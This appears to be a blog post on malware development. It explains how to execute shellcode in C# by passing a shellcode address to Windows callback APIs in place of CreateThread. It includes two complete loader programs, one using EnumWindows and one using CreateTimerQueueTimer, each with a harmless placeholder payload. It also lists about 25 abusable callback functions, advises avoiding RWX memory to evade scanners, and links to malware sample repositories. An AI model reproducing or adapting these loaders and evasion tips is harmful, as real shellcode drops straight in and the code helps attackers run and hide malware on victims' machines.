Malware Development: CSharp Alternative Shellcode Callbacks
For a while now, people have been using alternative callback methods in C/CSharp payloads instead of the vanilla CreateThread() or similar Windows API functions. There are several good repos on GitHub that can be used as resources for executing shellcode via Windows callback functions, and I found them very interesting.
To touch on the technical details of this functionality, Windows callback functions are “code within a managed application that helps an unmanaged DLL function complete a task. Calls to a callback function pass indirectly from a managed application, through a DLL function, and back to the managed implementation.” (Source: MSDN, Windows Callback Functions)
Simply put, callback functions can be used to execute a task from your code (such as executing shellcode): the API is handed a pointer to the shellcode where it expects a pointer to a callback routine, and it calls that pointer for you. Your code with callback functions would look like this:
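As an added illustration of the pattern (this is example code written for this page, not the post's own sample or anything from its repository), here is the synchronous variant in CSharp using EnumWindows(). It assumes x64 Windows and .NET with P/Invoke; the "shellcode" is a constructed placeholder (`mov eax, 1 ; ret`) so that the sample is harmless and simply returns TRUE to EnumWindows.

```csharp
// Added example, not code from the original post or its repo.
// Assumptions: x64 Windows, .NET with P/Invoke, placeholder payload below.
using System;
using System.Runtime.InteropServices;

class EnumWindowsCallbackExec
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    // BOOL EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam)
    // Declaring the callback parameter as IntPtr lets us pass the raw address of the
    // shellcode instead of a managed delegate; the API cannot tell the difference.
    [DllImport("user32.dll", SetLastError = true)]
    static extern bool EnumWindows(IntPtr lpEnumFunc, IntPtr lParam);

    const uint MEM_COMMIT = 0x1000;
    const uint MEM_RESERVE = 0x2000;
    const uint PAGE_READWRITE = 0x04;
    const uint PAGE_EXECUTE_READ = 0x20;

    // Constructed placeholder payload for x64: mov eax, 1 ; ret
    // (returns TRUE so the enumeration continues). A real payload would be
    // position-independent shellcode placed here instead.
    static readonly byte[] Shellcode = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3 };

    static void Main()
    {
        // 1. Allocate RW memory and copy the payload in.
        IntPtr mem = VirtualAlloc(IntPtr.Zero, (UIntPtr)(uint)Shellcode.Length,
                                  MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (mem == IntPtr.Zero)
            throw new InvalidOperationException("VirtualAlloc failed: " + Marshal.GetLastWin32Error());
        Marshal.Copy(Shellcode, 0, mem, Shellcode.Length);

        // 2. Flip the page RW -> RX. Allocating RWX up front works too, but RWX private
        //    memory is a common memory-scanner heuristic, so avoid it where possible.
        if (!VirtualProtect(mem, (UIntPtr)(uint)Shellcode.Length, PAGE_EXECUTE_READ, out uint oldProtect))
            throw new InvalidOperationException("VirtualProtect failed: " + Marshal.GetLastWin32Error());

        // 3. Hand the shellcode address to EnumWindows as its WNDENUMPROC. The API invokes it
        //    on the calling thread, once per top-level window, so the payload runs synchronously.
        bool ok = EnumWindows(mem, IntPtr.Zero);
        Console.WriteLine("EnumWindows returned " + ok + " (callback ran on managed thread " +
                          Environment.CurrentManagedThreadId + ")");
    }
}
```

Two practical notes on this pattern. First, an enumeration API calls the callback repeatedly (here once per top-level window), so a payload that actually returns should return FALSE (eax = 0) to stop the enumeration after the first call; most real shellcode never returns, which makes the point moot. Second, on 32-bit builds WNDENUMPROC is stdcall with two arguments, so the stub would need `ret 8` rather than `ret`; the placeholder above is x64-only.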
Some of the most common callback functions that you may have heard of are EnumFontFamilies(), EnumPrinters(), and EnumWindows(). On top of that, there are MANY more documented callback functions that can be abused to execute shellcode in Windows. Here are some of my favourites, either shared with me or that I came across myself:
- DamonMohammadbagher/NativePayload_CB
- aahmad097/AlternativeShellcodeExec
- VX Underground Windows malware
- Wra7h/FlavorTown
I realized that there were numerous resources for C/C++ code samples to execute shellcode via callback functions, but fewer resources available for CSharp. So I decided to convert some C callback samples to their CSharp equivalents, and to attempt to discover undocumented callback functions for shellcode execution.
Below is a list of all the callback functions I’ve created malware samples for (so far) to execute shellcode in CSharp:
- AddPropSheetPageProc
- CertEnumSystemStore
- CertEnumSystemStoreLocation
- CreateTimerQueueTimer
- CryptEnumOIDInfo
- DSA_EnumCallback
- EncryptedFileRaw
- EnumDateFormatsA
- EnumFontFamiliesW
- EnumLanguageGroupLocalesW
- EnumObjects
- EnumSystemCodePagesA
- EnumSystemGeoID
- EnumerateLoadedModules
- FiberContextEdit
- ImmEnumInputContext
- InitOnceExecuteOnce
- LdrEnumerateLoadedModules
- NotifyIpInterfaceChange
- NotifyTeredoPortChange
- SetTimer
- SetupCommitFileQueueW
- StackWalk
- SymEnumProcesses
- SymRegisterCallback
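Not every function in the list above invokes its callback synchronously on the calling thread the way the Enum* family does. CreateTimerQueueTimer, for instance, fires the callback later on a thread-pool thread, so the caller has to keep the process alive and should wait for the callback to finish before tearing the timer down. The following is an added example written for this page (not the post's repo code) of that asynchronous variant; it assumes x64 Windows, .NET with P/Invoke, and uses the same constructed placeholder payload (`mov eax, 1 ; ret`, harmless; WAITORTIMERCALLBACK ignores the return value).

```csharp
// Added example, not code from the original post or its repo.
// Assumptions: x64 Windows, .NET with P/Invoke, placeholder payload below.
using System;
using System.Runtime.InteropServices;
using System.Threading;

class TimerQueueCallbackExec
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    // BOOL CreateTimerQueueTimer(PHANDLE phNewTimer, HANDLE TimerQueue, WAITORTIMERCALLBACK Callback,
    //                            PVOID Parameter, DWORD DueTime, DWORD Period, ULONG Flags)
    // Callback is declared as IntPtr so the shellcode address can be passed directly.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CreateTimerQueueTimer(out IntPtr phNewTimer, IntPtr TimerQueue, IntPtr Callback,
                                             IntPtr Parameter, uint DueTime, uint Period, uint Flags);

    // BOOL DeleteTimerQueueTimer(HANDLE TimerQueue, HANDLE Timer, HANDLE CompletionEvent)
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeleteTimerQueueTimer(IntPtr TimerQueue, IntPtr Timer, IntPtr CompletionEvent);

    const uint MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000;
    const uint PAGE_READWRITE = 0x04, PAGE_EXECUTE_READ = 0x20;
    const uint WT_EXECUTEONLYONCE = 0x00000008;          // fire once, not periodically
    static readonly IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);

    // Constructed placeholder payload for x64: mov eax, 1 ; ret
    static readonly byte[] Shellcode = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3 };

    static IntPtr StageShellcode(byte[] payload)
    {
        // Allocate RW, copy, then switch to RX (no RWX region ever exists).
        IntPtr mem = VirtualAlloc(IntPtr.Zero, (UIntPtr)(uint)payload.Length,
                                  MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (mem == IntPtr.Zero)
            throw new InvalidOperationException("VirtualAlloc failed: " + Marshal.GetLastWin32Error());
        Marshal.Copy(payload, 0, mem, payload.Length);
        if (!VirtualProtect(mem, (UIntPtr)(uint)payload.Length, PAGE_EXECUTE_READ, out uint old))
            throw new InvalidOperationException("VirtualProtect failed: " + Marshal.GetLastWin32Error());
        return mem;
    }

    static void Main()
    {
        IntPtr mem = StageShellcode(Shellcode);

        // TimerQueue = NULL selects the default process timer queue. The callback runs
        // on a thread-pool thread 100 ms from now, once (WT_EXECUTEONLYONCE, Period = 0).
        if (!CreateTimerQueueTimer(out IntPtr timer, IntPtr.Zero, mem, IntPtr.Zero,
                                   100, 0, WT_EXECUTEONLYONCE))
            throw new InvalidOperationException("CreateTimerQueueTimer failed: " + Marshal.GetLastWin32Error());

        // The call above returns immediately. If Main exited here the process would die
        // before the timer fired, so give the callback time to run.
        Thread.Sleep(1000);

        // CompletionEvent = INVALID_HANDLE_VALUE makes DeleteTimerQueueTimer block until any
        // in-flight callback has returned, which is safe here because we are not inside it.
        DeleteTimerQueueTimer(IntPtr.Zero, timer, INVALID_HANDLE_VALUE);
        Console.WriteLine("Timer callback fired on a thread-pool thread and was cleaned up.");
    }
}
```

The same "wait for the pool thread" consideration applies to the other asynchronous entries in the list (the Notify* functions, SetTimer which needs a message loop, and so on): with a payload that blocks forever, such as a reverse shell, the Sleep becomes an infinite wait, but with a short payload the timing matters, and tearing the timer down without the completion-event wait risks freeing or unmapping memory the callback is still executing from.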
And finally, here is the GitHub repo of all the documented callback function malware samples I created in CSharp:
LINK: My CSharp Alternative Shellcode Callbacks repo